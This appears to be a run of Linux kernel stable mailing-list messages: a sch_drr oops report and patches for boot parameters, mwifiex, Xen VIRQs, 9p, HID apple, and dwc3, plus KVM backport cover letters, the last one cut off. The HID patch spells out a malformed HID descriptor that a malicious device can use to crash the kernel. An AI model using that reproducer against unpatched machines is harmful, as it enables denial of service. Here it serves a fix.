Hi,
I'm seeing a reproducible kernel oops on my home router updating from 5.15.181 to 5.15.189:
kernel BUG at lib/list_debug.c:50!
invalid opcode: 0000 [#1] SMP NOPTI
..
Call Trace:
<TASK>
drr_qlen_notify+0x11/0x50 [sch_drr]
qdisc_tree_reduce_backlog+0x93/0xf0
drr_graft_class+0x109/0x220 [sch_drr]
qdisc_graft+0xdd/0x510
? qdisc_create+0x335/0x510
tc_modify_qdisc+0x53f/0x9d0
rtnetlink_rcv_msg+0x134/0x370
? __getblk_gfp+0x22/0x230
? rtnl_calcit.isra.38+0x130/0x130
netlink_rcv_skb+0x4f/0x100
rtnetlink_rcv+0x10/0x20
netlink_unicast+0x1d2/0x2a0
netlink_sendmsg+0x22a/0x480
? netlink_broadcast+0x20/0x20
____sys_sendmsg+0x25f/0x280
? copy_msghdr_from_user+0x5b/0x90
___sys_sendmsg+0x77/0xc0
? __sys_recvmsg+0x5a/0xb0
? do_filp_open+0xc3/0x120
__sys_sendmsg+0x5d/0xb0
__x64_sys_sendmsg+0x1a/0x20
x64_sys_call+0x17f1/0x1c80
do_syscall_64+0x53/0x80
? exit_to_user_mode_prepare+0x2c/0x140
? irqentry_exit_to_user_mode+0xe/0x20
? irqentry_exit+0x1d/0x30
? exc_page_fault+0x1e7/0x610
? do_syscall_64+0x5f/0x80
entry_SYSCALL_64_after_hwframe+0x6c/0xd6
..
RIP: 0010:__list_del_entry_valid.cold.1+0xf/0x69
syzbot reported a similar looking thing here:
[v5.15] BUG: unable to handle kernel paging request in drr_qlen_notify
https://groups.google.com/g/syzkaller-lts-bugs/c/_QJHiMHwfRw/m/2j1nSU1hBgAJ
and here:
"[syzbot] [net?] general protection fault in drr_qlen_notify"
https://www.spinics.net/lists/netdev/msg1105420.html
syzboot bisected it to:
****************************************
commit e269f29e9395527bc00c213c6b15da04ebb35070
Refs: v5.15.186-114-ge269f29e9395
Author: Lion Ackermann <nnamrec(a)gmail.com>
AuthorDate: Mon Jun 30 15:27:30 2025 +0200
Commit: Greg Kroah-Hartman <gregkh(a)linuxfoundation.org>
CommitDate: Thu Jul 10 15:57:46 2025 +0200
net/sched: Always pass notifications when child class becomes empty
[ Upstream commit 103406b38c600fec1fe375a77b27d87e314aea09 ]
****************************************
The last line of the commit message mentions:
"This is not a problem after the recent patch series
that made all the classful qdiscs qlen_notify() handlers idempotent."
It looks like the "idempotent" patches are missing from the 5.15 stable series.
Like this one:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/n…
I've tried Ubuntu's backport for 5.15:
https://git.launchpad.net/~ubuntu-kernel/ubuntu/+source/linux/+git/jammy/co…
It seems to be identical to:
https://lore.kernel.org/stable/bcf9c70e9cf750363782816c21c69792f6c81cd9.175…
While the kernel didn't oops anymore with the patch applied, the network traffic behaves erratic:
TCP traffic works, ICMP seems "stuck". tcpdump showed no icmp traffic on the ppp device.
Tomorrow I will try if I can reproduce the issue on a test VM.
Anything else I should try?
Thanks in advance,
Thomas
BootLoader (Grub, LILO, etc) may pass an identifier such as "BOOT_IMAGE=
/boot/vmlinuz-x.y.z" to kernel parameters. But these identifiers are not
recognized by the kernel itself so will be passed to user space. However
user space init program also doesn't recognized it.
KEXEC/KDUMP (kexec-tools) may also pass an identifier such as "kexec" on
some architectures.
We cannot change BootLoader's behavior, because this behavior exists for
many years, and there are already user space programs search BOOT_IMAGE=
in /proc/cmdline to obtain the kernel image locations:
https://github.com/linuxdeepin/deepin-ab-recovery/blob/master/util.go
(search getBootOptions)
https://github.com/linuxdeepin/deepin-ab-recovery/blob/master/main.go
(search getKernelReleaseWithBootOption)
So the the best way is handle (ignore) it by the kernel itself, which
can avoid such boot warnings (if we use something like init=/bin/bash,
bootloader identifier can even cause a crash):
Kernel command line: BOOT_IMAGE=(hd0,1)/vmlinuz-6.x root=/dev/sda3 ro console=tty
Unknown kernel command line parameters "BOOT_IMAGE=(hd0,1)/vmlinuz-6.x", will be passed to user space.
Cc: stable(a)vger.kernel.org
Signed-off-by: Huacai Chen <chenhuacai(a)loongson.cn>
---
V2: Update comments and commit messages.
V3: Document bootloader identifiers.
V4: Use strstarts() instead of strncmp().
init/main.c | 12 ++++++++++++
1 file changed, 12 insertions(+)
diff --git a/init/main.c b/init/main.c
index 0ee0ee7b7c2c..9b5150166bcf 100644
--- a/init/main.c
+++ b/init/main.c
@@ -544,6 +544,12 @@ static int __init unknown_bootoption(char *param, char *val,
const char *unused, void *arg)
{
size_t len = strlen(param);
+ /*
+ * Well-known bootloader identifiers:
+ * 1. LILO/Grub pass "BOOT_IMAGE=...";
+ * 2. kexec/kdump (kexec-tools) pass "kexec".
+ */
+ const char *bootloader[] = { "BOOT_IMAGE=", "kexec", NULL };
/* Handle params aliased to sysctls */
if (sysctl_is_alias(param))
@@ -551,6 +557,12 @@ static int __init unknown_bootoption(char *param, char *val,
repair_env_string(param, val);
+ /* Handle bootloader identifier */
+ for (int i = 0; bootloader[i]; i++) {
+ if (strstarts(param, bootloader[i]))
+ return 0;
+ }
+
/* Handle obsolete-style parameters */
if (obsolete_checksetup(param))
return 0;
--
2.47.3
BootLoader (Grub, LILO, etc) may pass an identifier such as "BOOT_IMAGE=
/boot/vmlinuz-x.y.z" to kernel parameters. But these identifiers are not
recognized by the kernel itself so will be passed to user space. However
user space init program also doesn't recognized it.
KEXEC/KDUMP (kexec-tools) may also pass an identifier such as "kexec" on
some architectures.
We cannot change BootLoader's behavior, because this behavior exists for
many years, and there are already user space programs search BOOT_IMAGE=
in /proc/cmdline to obtain the kernel image locations:
https://github.com/linuxdeepin/deepin-ab-recovery/blob/master/util.go
(search getBootOptions)
https://github.com/linuxdeepin/deepin-ab-recovery/blob/master/main.go
(search getKernelReleaseWithBootOption)
So the the best way is handle (ignore) it by the kernel itself, which
can avoid such boot warnings (if we use something like init=/bin/bash,
bootloader identifier can even cause a crash):
Kernel command line: BOOT_IMAGE=(hd0,1)/vmlinuz-6.x root=/dev/sda3 ro console=tty
Unknown kernel command line parameters "BOOT_IMAGE=(hd0,1)/vmlinuz-6.x", will be passed to user space.
Cc: stable(a)vger.kernel.org
Signed-off-by: Huacai Chen <chenhuacai(a)loongson.cn>
---
V2: Update comments and commit messages.
V3: Document bootloader identifiers.
init/main.c | 12 ++++++++++++
1 file changed, 12 insertions(+)
diff --git a/init/main.c b/init/main.c
index 225a58279acd..b25e7da5347a 100644
--- a/init/main.c
+++ b/init/main.c
@@ -545,6 +545,12 @@ static int __init unknown_bootoption(char *param, char *val,
const char *unused, void *arg)
{
size_t len = strlen(param);
+ /*
+ * Well-known bootloader identifiers:
+ * 1. LILO/Grub pass "BOOT_IMAGE=...";
+ * 2. kexec/kdump (kexec-tools) pass "kexec".
+ */
+ const char *bootloader[] = { "BOOT_IMAGE=", "kexec", NULL };
/* Handle params aliased to sysctls */
if (sysctl_is_alias(param))
@@ -552,6 +558,12 @@ static int __init unknown_bootoption(char *param, char *val,
repair_env_string(param, val);
+ /* Handle bootloader identifier */
+ for (int i = 0; bootloader[i]; i++) {
+ if (!strncmp(param, bootloader[i], strlen(bootloader[i])))
+ return 0;
+ }
+
/* Handle obsolete-style parameters */
if (obsolete_checksetup(param))
return 0;
--
2.47.3
Add fixes to the CC contaminant/connection detection logic to improve
reliability and stability of the maxim tcpc driver.
---
Amit Sunil Dhamne (2):
usb: typec: maxim_contaminant: disable low power mode when reading comparator values
usb: typec: maxim_contaminant: re-enable cc toggle if cc is open and port is clean
drivers/usb/typec/tcpm/maxim_contaminant.c | 58 ++++++++++++++++++++++++++++++
drivers/usb/typec/tcpm/tcpci_maxim.h | 1 +
2 files changed, 59 insertions(+)
---
base-commit: 89be9a83ccf1f88522317ce02f854f30d6115c41
change-id: 20250802-fix-upstream-contaminant-16910e2762ca
Best regards,
--
Amit Sunil Dhamne <amitsd(a)google.com>
The adapter->chan_stats[] array is initialized in
mwifiex_init_channel_scan_gap() with vmalloc(), which doesn't zero out
memory. The array is filled in mwifiex_update_chan_statistics()
and then the user can query the data in mwifiex_cfg80211_dump_survey().
There are two potential issues here. What if the user calls
mwifiex_cfg80211_dump_survey() before the data has been filled in.
Also the mwifiex_update_chan_statistics() function doesn't necessarily
initialize the whole array. Since the array was not initialized at
the start that could result in an information leak.
Also this array is pretty small. It's a maximum of 900 bytes so it's
more appropriate to use kcalloc() instead vmalloc().
Cc: stable(a)vger.kernel.org
Fixes: bf35443314ac ("mwifiex: channel statistics support for mwifiex")
Suggested-by: Dan Carpenter <dan.carpenter(a)linaro.org>
Signed-off-by: Qianfeng Rong <rongqianfeng(a)vivo.com>
---
v2: Change vmalloc_array/vfree to kcalloc/kfree.
v3: Improved commit message.
---
drivers/net/wireless/marvell/mwifiex/cfg80211.c | 5 +++--
drivers/net/wireless/marvell/mwifiex/main.c | 4 ++--
2 files changed, 5 insertions(+), 4 deletions(-)
diff --git a/drivers/net/wireless/marvell/mwifiex/cfg80211.c b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
index 3498743d5ec0..4c8c7a5fdf23 100644
--- a/drivers/net/wireless/marvell/mwifiex/cfg80211.c
+++ b/drivers/net/wireless/marvell/mwifiex/cfg80211.c
@@ -4673,8 +4673,9 @@ int mwifiex_init_channel_scan_gap(struct mwifiex_adapter *adapter)
* additional active scan request for hidden SSIDs on passive channels.
*/
adapter->num_in_chan_stats = 2 * (n_channels_bg + n_channels_a);
- adapter->chan_stats = vmalloc(array_size(sizeof(*adapter->chan_stats),
- adapter->num_in_chan_stats));
+ adapter->chan_stats = kcalloc(adapter->num_in_chan_stats,
+ sizeof(*adapter->chan_stats),
+ GFP_KERNEL);
if (!adapter->chan_stats)
return -ENOMEM;
diff --git a/drivers/net/wireless/marvell/mwifiex/main.c b/drivers/net/wireless/marvell/mwifiex/main.c
index 7b50a88a18e5..1ec069bc8ea1 100644
--- a/drivers/net/wireless/marvell/mwifiex/main.c
+++ b/drivers/net/wireless/marvell/mwifiex/main.c
@@ -642,7 +642,7 @@ static int _mwifiex_fw_dpc(const struct firmware *firmware, void *context)
goto done;
err_add_intf:
- vfree(adapter->chan_stats);
+ kfree(adapter->chan_stats);
err_init_chan_scan:
wiphy_unregister(adapter->wiphy);
wiphy_free(adapter->wiphy);
@@ -1485,7 +1485,7 @@ static void mwifiex_uninit_sw(struct mwifiex_adapter *adapter)
wiphy_free(adapter->wiphy);
adapter->wiphy = NULL;
- vfree(adapter->chan_stats);
+ kfree(adapter->chan_stats);
mwifiex_free_cmd_buffers(adapter);
}
--
2.34.1
VIRQs come in 3 flavors, per-VPU, per-domain, and global. The existing
tracking of VIRQs is handled by per-cpu variables virq_to_irq.
The issue is that bind_virq_to_irq() sets the per_cpu virq_to_irq at
registration time - typically CPU 0. Later, the interrupt can migrate,
and info->cpu is updated. When calling unbind_from_irq(), the per-cpu
virq_to_irq is cleared for a different cpu. If bind_virq_to_irq() is
called again with CPU 0, the stale irq is returned.
Change the virq_to_irq tracking to use CPU 0 for per-domain and global
VIRQs. As there can be at most one of each, there is no need for
per-vcpu tracking. Also, per-domain and global VIRQs need to be
registered on CPU 0 and can later move, so this matches the expectation.
Fixes: e46cdb66c8fc ("xen: event channels")
Cc: stable(a)vger.kernel.org
Signed-off-by: Jason Andryuk <jason.andryuk(a)amd.com>
---
Fixes is the introduction of the virq_to_irq per-cpu array.
This was found with the out-of-tree argo driver during suspend/resume.
On suspend, the per-domain VIRQ_ARGO is unbound. On resume, the driver
attempts to bind VIRQ_ARGO. The stale irq is returned, but the
WARN_ON(info == NULL || info->type != IRQT_VIRQ) in bind_virq_to_irq()
triggers for NULL info. The bind fails and execution continues with the
driver trying to clean up by unbinding. This eventually faults over the
NULL info.
---
drivers/xen/events/events_base.c | 17 ++++++++++++++++-
1 file changed, 16 insertions(+), 1 deletion(-)
diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
index 41309d38f78c..a27e4d7f061e 100644
--- a/drivers/xen/events/events_base.c
+++ b/drivers/xen/events/events_base.c
@@ -159,7 +159,19 @@ static DEFINE_MUTEX(irq_mapping_update_lock);
static LIST_HEAD(xen_irq_list_head);
-/* IRQ <-> VIRQ mapping. */
+static bool is_per_vcpu_virq(int virq) {
+ switch (virq) {
+ case VIRQ_TIMER:
+ case VIRQ_DEBUG:
+ case VIRQ_XENOPROF:
+ case VIRQ_XENPMU:
+ return true;
+ default:
+ return false;
+ }
+}
+
+/* IRQ <-> VIRQ mapping. Global/Domain virqs are tracked in cpu 0. */
static DEFINE_PER_CPU(int [NR_VIRQS], virq_to_irq) = {[0 ... NR_VIRQS-1] = -1};
/* IRQ <-> IPI mapping */
@@ -974,6 +986,9 @@ static void __unbind_from_irq(struct irq_info *info, unsigned int irq)
switch (info->type) {
case IRQT_VIRQ:
+ if (!is_per_vcpu_virq(virq_from_irq(info)))
+ cpu = 0;
+
per_cpu(virq_to_irq, cpu)[virq_from_irq(info)] = -1;
break;
case IRQT_IPI:
--
2.50.1
Syzkaller reports a KASAN issue as below:
general protection fault, probably for non-canonical address 0xfbd59c0000000021: 0000 [#1] PREEMPT SMP KASAN NOPTI
KASAN: maybe wild-memory-access in range [0xdead000000000108-0xdead00000000010f]
CPU: 0 PID: 5083 Comm: syz-executor.2 Not tainted 6.1.134-syzkaller-00037-g855bd1d7d838 #0
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
RIP: 0010:__list_del include/linux/list.h:114 [inline]
RIP: 0010:__list_del_entry include/linux/list.h:137 [inline]
RIP: 0010:list_del include/linux/list.h:148 [inline]
RIP: 0010:p9_fd_cancelled+0xe9/0x200 net/9p/trans_fd.c:734
Call Trace:
<TASK>
p9_client_flush+0x351/0x440 net/9p/client.c:614
p9_client_rpc+0xb6b/0xc70 net/9p/client.c:734
p9_client_version net/9p/client.c:920 [inline]
p9_client_create+0xb51/0x1240 net/9p/client.c:1027
v9fs_session_init+0x1f0/0x18f0 fs/9p/v9fs.c:408
v9fs_mount+0xba/0xcb0 fs/9p/vfs_super.c:126
legacy_get_tree+0x108/0x220 fs/fs_context.c:632
vfs_get_tree+0x8e/0x300 fs/super.c:1573
do_new_mount fs/namespace.c:3056 [inline]
path_mount+0x6a6/0x1e90 fs/namespace.c:3386
do_mount fs/namespace.c:3399 [inline]
__do_sys_mount fs/namespace.c:3607 [inline]
__se_sys_mount fs/namespace.c:3584 [inline]
__x64_sys_mount+0x283/0x300 fs/namespace.c:3584
do_syscall_x64 arch/x86/entry/common.c:51 [inline]
do_syscall_64+0x35/0x80 arch/x86/entry/common.c:81
entry_SYSCALL_64_after_hwframe+0x6e/0xd8
This happens because of a race condition between:
- The 9p client sending an invalid flush request and later cleaning it up;
- The 9p client in p9_read_work() canceled all pending requests.
Thread 1 Thread 2
...
p9_client_create()
...
p9_fd_create()
...
p9_conn_create()
...
// start Thread 2
INIT_WORK(&m->rq, p9_read_work);
p9_read_work()
...
p9_client_rpc()
...
...
p9_conn_cancel()
...
spin_lock(&m->req_lock);
...
p9_fd_cancelled()
...
...
spin_unlock(&m->req_lock);
// status rewrite
p9_client_cb(m->client, req, REQ_STATUS_ERROR)
// first remove
list_del(&req->req_list);
...
spin_lock(&m->req_lock)
...
// second remove
list_del(&req->req_list);
spin_unlock(&m->req_lock)
...
Commit 74d6a5d56629 ("9p/trans_fd: Fix concurrency del of req_list in
p9_fd_cancelled/p9_read_work") fixes a concurrency issue in the 9p filesystem
client where the req_list could be deleted simultaneously by both
p9_read_work and p9_fd_cancelled functions, but for the case where req->status
equals REQ_STATUS_RCVD.
Add an explicit check for REQ_STATUS_ERROR in p9_fd_cancelled before
processing the request. Skip processing if the request is already in the error
state, as it has been removed and its resources cleaned up.
Found by Linux Verification Center (linuxtesting.org) with Syzkaller.
Fixes: afd8d6541155 ("9P: Add cancelled() to the transport functions.")
Cc: stable(a)vger.kernel.org
Signed-off-by: Nalivayko Sergey <Sergey.Nalivayko(a)kaspersky.com>
---
net/9p/trans_fd.c | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/net/9p/trans_fd.c b/net/9p/trans_fd.c
index a69422366a23..a6054a392a90 100644
--- a/net/9p/trans_fd.c
+++ b/net/9p/trans_fd.c
@@ -721,9 +721,9 @@ static int p9_fd_cancelled(struct p9_client *client, struct p9_req_t *req)
spin_lock(&m->req_lock);
/* Ignore cancelled request if message has been received
- * before lock.
- */
- if (req->status == REQ_STATUS_RCVD) {
+ * or cancelled with error before lock.
+ */
+ if (req->status == REQ_STATUS_RCVD || req->status == REQ_STATUS_ERROR) {
spin_unlock(&m->req_lock);
return 0;
}
--
2.30.2
From: Qasim Ijaz <qasdev00(a)gmail.com>
commit 1bb3363da862e0464ec050eea2fb5472a36ad86b upstream.
A malicious HID device with quirk APPLE_MAGIC_BACKLIGHT can trigger a NULL
pointer dereference whilst the power feature-report is toggled and sent to
the device in apple_magic_backlight_report_set(). The power feature-report
is expected to have two data fields, but if the descriptor declares one
field then accessing field[1] and dereferencing it in
apple_magic_backlight_report_set() becomes invalid
since field[1] will be NULL.
An example of a minimal descriptor which can cause the crash is something
like the following where the report with ID 3 (power report) only
references a single 1-byte field. When hid core parses the descriptor it
will encounter the final feature tag, allocate a hid_report (all members
of field[] will be zeroed out), create field structure and populate it,
increasing the maxfield to 1. The subsequent field[1] access and
dereference causes the crash.
Usage Page (Vendor Defined 0xFF00)
Usage (0x0F)
Collection (Application)
Report ID (1)
Usage (0x01)
Logical Minimum (0)
Logical Maximum (255)
Report Size (8)
Report Count (1)
Feature (Data,Var,Abs)
Usage (0x02)
Logical Maximum (32767)
Report Size (16)
Report Count (1)
Feature (Data,Var,Abs)
Report ID (3)
Usage (0x03)
Logical Minimum (0)
Logical Maximum (1)
Report Size (8)
Report Count (1)
Feature (Data,Var,Abs)
End Collection
Here we see the KASAN splat when the kernel dereferences the
NULL pointer and crashes:
[ 15.164723] Oops: general protection fault, probably for non-canonical address 0xdffffc0000000006: 0000 [#1] SMP KASAN NOPTI
[ 15.165691] KASAN: null-ptr-deref in range [0x0000000000000030-0x0000000000000037]
[ 15.165691] CPU: 0 UID: 0 PID: 10 Comm: kworker/0:1 Not tainted 6.15.0 #31 PREEMPT(voluntary)
[ 15.165691] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
[ 15.165691] RIP: 0010:apple_magic_backlight_report_set+0xbf/0x210
[ 15.165691] Call Trace:
[ 15.165691] <TASK>
[ 15.165691] apple_probe+0x571/0xa20
[ 15.165691] hid_device_probe+0x2e2/0x6f0
[ 15.165691] really_probe+0x1ca/0x5c0
[ 15.165691] __driver_probe_device+0x24f/0x310
[ 15.165691] driver_probe_device+0x4a/0xd0
[ 15.165691] __device_attach_driver+0x169/0x220
[ 15.165691] bus_for_each_drv+0x118/0x1b0
[ 15.165691] __device_attach+0x1d5/0x380
[ 15.165691] device_initial_probe+0x12/0x20
[ 15.165691] bus_probe_device+0x13d/0x180
[ 15.165691] device_add+0xd87/0x1510
[...]
To fix this issue we should validate the number of fields that the
backlight and power reports have and if they do not have the required
number of fields then bail.
Fixes: 394ba612f941 ("HID: apple: Add support for magic keyboard backlight on T2 Macs")
Cc: stable(a)vger.kernel.org
Signed-off-by: Qasim Ijaz <qasdev00(a)gmail.com>
Reviewed-by: Orlando Chamberlain <orlandoch.dev(a)gmail.com>
Tested-by: Aditya Garg <gargaditya08(a)live.com>
Link: https://patch.msgid.link/20250713233008.15131-1-qasdev00@gmail.com
Signed-off-by: Benjamin Tissoires <bentiss(a)kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh(a)linuxfoundation.org>
---
drivers/hid/hid-apple.c | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/drivers/hid/hid-apple.c b/drivers/hid/hid-apple.c
index d900dd05c335..c00ce5bfec4a 100644
--- a/drivers/hid/hid-apple.c
+++ b/drivers/hid/hid-apple.c
@@ -890,7 +890,8 @@ static int apple_magic_backlight_init(struct hid_device *hdev)
backlight->brightness = report_enum->report_id_hash[APPLE_MAGIC_REPORT_ID_BRIGHTNESS];
backlight->power = report_enum->report_id_hash[APPLE_MAGIC_REPORT_ID_POWER];
- if (!backlight->brightness || !backlight->power)
+ if (!backlight->brightness || backlight->brightness->maxfield < 2 ||
+ !backlight->power || backlight->power->maxfield < 2)
return -ENODEV;
backlight->cdev.name = ":white:" LED_FUNCTION_KBD_BACKLIGHT;
--
2.43.0
This commit addresses a rarely observed endpoint command timeout
which causes kernel panic due to warn when 'panic_on_warn' is enabled
and unnecessary call trace prints when 'panic_on_warn' is disabled.
It is seen during fast software-controlled connect/disconnect testcases.
The following is one such endpoint command timeout that we observed:
1. Connect
=======
->dwc3_thread_interrupt
->dwc3_ep0_interrupt
->configfs_composite_setup
->composite_setup
->usb_ep_queue
->dwc3_gadget_ep0_queue
->__dwc3_gadget_ep0_queue
->__dwc3_ep0_do_control_data
->dwc3_send_gadget_ep_cmd
2. Disconnect
==========
->dwc3_thread_interrupt
->dwc3_gadget_disconnect_interrupt
->dwc3_ep0_reset_state
->dwc3_ep0_end_control_data
->dwc3_send_gadget_ep_cmd
In the issue scenario, in Exynos platforms, we observed that control
transfers for the previous connect have not yet been completed and end
transfer command sent as a part of the disconnect sequence and
processing of USB_ENDPOINT_HALT feature request from the host timeout.
This maybe an expected scenario since the controller is processing EP
commands sent as a part of the previous connect. It maybe better to
remove WARN_ON in all places where device endpoint commands are sent to
avoid unnecessary kernel panic due to warn.
Cc: stable(a)vger.kernel.org
Co-developed-by: Akash M <akash.m5(a)samsung.com>
Signed-off-by: Akash M <akash.m5(a)samsung.com>
Signed-off-by: Selvarasu Ganesan <selvarasu.g(a)samsung.com>
Acked-by: Thinh Nguyen <Thinh.Nguyen(a)synopsys.com>
---
Changes in v3:
- Added Co-developed-by tags to reflect the correct authorship.
- And Added Acked-by tag as well.
Link to v2: https://lore.kernel.org/all/20250807014639.1596-1-selvarasu.g@samsung.com/
Changes in v2:
- Removed the 'Fixes' tag from the commit message, as this patch does
not contain a fix.
- And Retained the 'stable' tag, as these changes are intended to be
applied across all stable kernels.
- Additionally, replaced 'dev_warn*' with 'dev_err*'."
Link to v1: https://lore.kernel.org/all/20250807005638.thhsgjn73aaov2af@synopsys.com/
---
drivers/usb/dwc3/ep0.c | 20 ++++++++++++++++----
drivers/usb/dwc3/gadget.c | 10 ++++++++--
2 files changed, 24 insertions(+), 6 deletions(-)
diff --git a/drivers/usb/dwc3/ep0.c b/drivers/usb/dwc3/ep0.c
index 666ac432f52d..b4229aa13f37 100644
--- a/drivers/usb/dwc3/ep0.c
+++ b/drivers/usb/dwc3/ep0.c
@@ -288,7 +288,9 @@ void dwc3_ep0_out_start(struct dwc3 *dwc)
dwc3_ep0_prepare_one_trb(dep, dwc->ep0_trb_addr, 8,
DWC3_TRBCTL_CONTROL_SETUP, false);
ret = dwc3_ep0_start_trans(dep);
- WARN_ON(ret < 0);
+ if (ret < 0)
+ dev_err(dwc->dev, "ep0 out start transfer failed: %d\n", ret);
+
for (i = 2; i < DWC3_ENDPOINTS_NUM; i++) {
struct dwc3_ep *dwc3_ep;
@@ -1061,7 +1063,9 @@ static void __dwc3_ep0_do_control_data(struct dwc3 *dwc,
ret = dwc3_ep0_start_trans(dep);
}
- WARN_ON(ret < 0);
+ if (ret < 0)
+ dev_err(dwc->dev,
+ "ep0 data phase start transfer failed: %d\n", ret);
}
static int dwc3_ep0_start_control_status(struct dwc3_ep *dep)
@@ -1078,7 +1082,12 @@ static int dwc3_ep0_start_control_status(struct dwc3_ep *dep)
static void __dwc3_ep0_do_control_status(struct dwc3 *dwc, struct dwc3_ep *dep)
{
- WARN_ON(dwc3_ep0_start_control_status(dep));
+ int ret;
+
+ ret = dwc3_ep0_start_control_status(dep);
+ if (ret)
+ dev_err(dwc->dev,
+ "ep0 status phase start transfer failed: %d\n", ret);
}
static void dwc3_ep0_do_control_status(struct dwc3 *dwc,
@@ -1121,7 +1130,10 @@ void dwc3_ep0_end_control_data(struct dwc3 *dwc, struct dwc3_ep *dep)
cmd |= DWC3_DEPCMD_PARAM(dep->resource_index);
memset(¶ms, 0, sizeof(params));
ret = dwc3_send_gadget_ep_cmd(dep, cmd, ¶ms);
- WARN_ON_ONCE(ret);
+ if (ret)
+ dev_err_ratelimited(dwc->dev,
+ "ep0 data phase end transfer failed: %d\n", ret);
+
dep->resource_index = 0;
}
diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
index 4a3e97e606d1..4a3d076c1015 100644
--- a/drivers/usb/dwc3/gadget.c
+++ b/drivers/usb/dwc3/gadget.c
@@ -1772,7 +1772,11 @@ static int __dwc3_stop_active_transfer(struct dwc3_ep *dep, bool force, bool int
dep->flags |= DWC3_EP_DELAY_STOP;
return 0;
}
- WARN_ON_ONCE(ret);
+
+ if (ret)
+ dev_err_ratelimited(dep->dwc->dev,
+ "end transfer failed: %d\n", ret);
+
dep->resource_index = 0;
if (!interrupt)
@@ -4039,7 +4043,9 @@ static void dwc3_clear_stall_all_ep(struct dwc3 *dwc)
dep->flags &= ~DWC3_EP_STALL;
ret = dwc3_send_clear_stall_ep_cmd(dep);
- WARN_ON_ONCE(ret);
+ if (ret)
+ dev_err_ratelimited(dwc->dev,
+ "failed to clear STALL on %s\n", dep->name);
}
}
--
2.17.1
Same spiel as the 6.1.y collection...
This is a collection of backports for patches that were Cc'd to stable,
but failed to apply, along with their dependencies.
Note, Sasha already posted[1][2] these (and I acked them):
KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is supported
KVM: x86/pmu: Gate all "unimplemented MSR" prints on report_ignored_msrs
KVM: VMX: Extract checking of guest's DEBUGCTL into helper
KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested VM-Enter
KVM: VMX: Wrap all accesses to IA32_DEBUGCTL with getter/setter APIs
I'm including them here to hopefully make life easier for y'all, and because
the order they are presented here is the preferred ordering, i.e. should be
the same ordering as the original upstream patches.
But, if you end up grabbing Sasha's patches first, it's not a big deal as the
only true dependencies is that the DEBUGCTL.RTM_DEBUG patch needs to land
before "Check vmcs12->guest_ia32_debugctl on nested VM-Enter".
Many of the patches to get to the last patch (the DEBUGCTLMSR_FREEZE_IN_SMM
fix) are dependencies that arguably shouldn't be backported to LTS kernels.
I opted to do the backports because none of the patches are scary (if it was
1-3 dependency patches instead of 8 I wouldn't hesitate), and there's a decent
chance they'll be dependencies for future fixes.
[1] https://lore.kernel.org/all/20250813183728.2070321-1-sashal@kernel.org
[2] https://lore.kernel.org/all/20250814131146.2093579-1-sashal@kernel.org
Chao Gao (1):
KVM: nVMX: Defer SVI update to vmcs01 on EOI when L2 is active w/o VID
Manuel Andreas (1):
KVM: x86/hyper-v: Skip non-canonical addresses during PV TLB flush
Maxim Levitsky (3):
KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested VM-Enter
KVM: VMX: Wrap all accesses to IA32_DEBUGCTL with getter/setter APIs
KVM: VMX: Preserve host's DEBUGCTLMSR_FREEZE_IN_SMM while running the
guest
Sean Christopherson (15):
KVM: SVM: Set RFLAGS.IF=1 in C code, to get VMRUN out of the STI
shadow
KVM: x86: Plumb in the vCPU to kvm_x86_ops.hwapic_isr_update()
KVM: x86: Take irqfds.lock when adding/deleting IRQ bypass producer
KVM: x86: Snapshot the host's DEBUGCTL in common x86
KVM: x86: Snapshot the host's DEBUGCTL after disabling IRQs
KVM: x86: Plumb "force_immediate_exit" into kvm_entry() tracepoint
KVM: VMX: Re-enter guest in fastpath for "spurious" preemption timer
exits
KVM: VMX: Handle forced exit due to preemption timer in fastpath
KVM: x86: Move handling of is_guest_mode() into fastpath exit handlers
KVM: VMX: Handle KVM-induced preemption timer exits in fastpath for L2
KVM: x86: Fully defer to vendor code to decide how to force immediate
exit
KVM: x86: Convert vcpu_run()'s immediate exit param into a generic
bitmap
KVM: x86: Drop kvm_x86_ops.set_dr6() in favor of a new KVM_RUN flag
KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is supported
KVM: VMX: Extract checking of guest's DEBUGCTL into helper
arch/x86/include/asm/kvm-x86-ops.h | 2 -
arch/x86/include/asm/kvm_host.h | 22 ++--
arch/x86/include/asm/msr-index.h | 1 +
arch/x86/kvm/hyperv.c | 3 +
arch/x86/kvm/lapic.c | 19 +++-
arch/x86/kvm/lapic.h | 1 +
arch/x86/kvm/svm/svm.c | 42 +++++---
arch/x86/kvm/svm/vmenter.S | 9 +-
arch/x86/kvm/trace.h | 9 +-
arch/x86/kvm/vmx/nested.c | 26 ++++-
arch/x86/kvm/vmx/pmu_intel.c | 8 +-
arch/x86/kvm/vmx/vmx.c | 164 +++++++++++++++++++----------
arch/x86/kvm/vmx/vmx.h | 31 +++++-
arch/x86/kvm/x86.c | 46 +++++---
14 files changed, 265 insertions(+), 118 deletions(-)
base-commit: 3a8ababb8b6a0ced2be230b60b6e3ddbd8d67014
--
2.51.0.rc1.163.g2494970778-goog
This is a collection of backports for patches that were Cc'd to stable,
but failed to apply, along with their dependencies.
Note, Sasha already posted[1][2] these (and I acked them):
KVM: VMX: Allow guest to set DEBUGCTL.RTM_DEBUG if RTM is supported
KVM: x86/pmu: Gate all "unimplemented MSR" prints on report_ignored_msrs
KVM: VMX: Extract checking of guest's DEBUGCTL into helper
KVM: nVMX: Check vmcs12->guest_ia32_debugctl on nested VM-Enter
KVM: VMX: Wrap all accesses to IA32_DEBUGCTL with getter/setter APIs
I'm including them here to hopefully make life easier for y'all, and because
the order they are presented here is the preferred ordering, i.e. should be
the same ordering as the original upstream patches.
But, if you end up grabbing Sasha's patches first, it's not a big deal as the
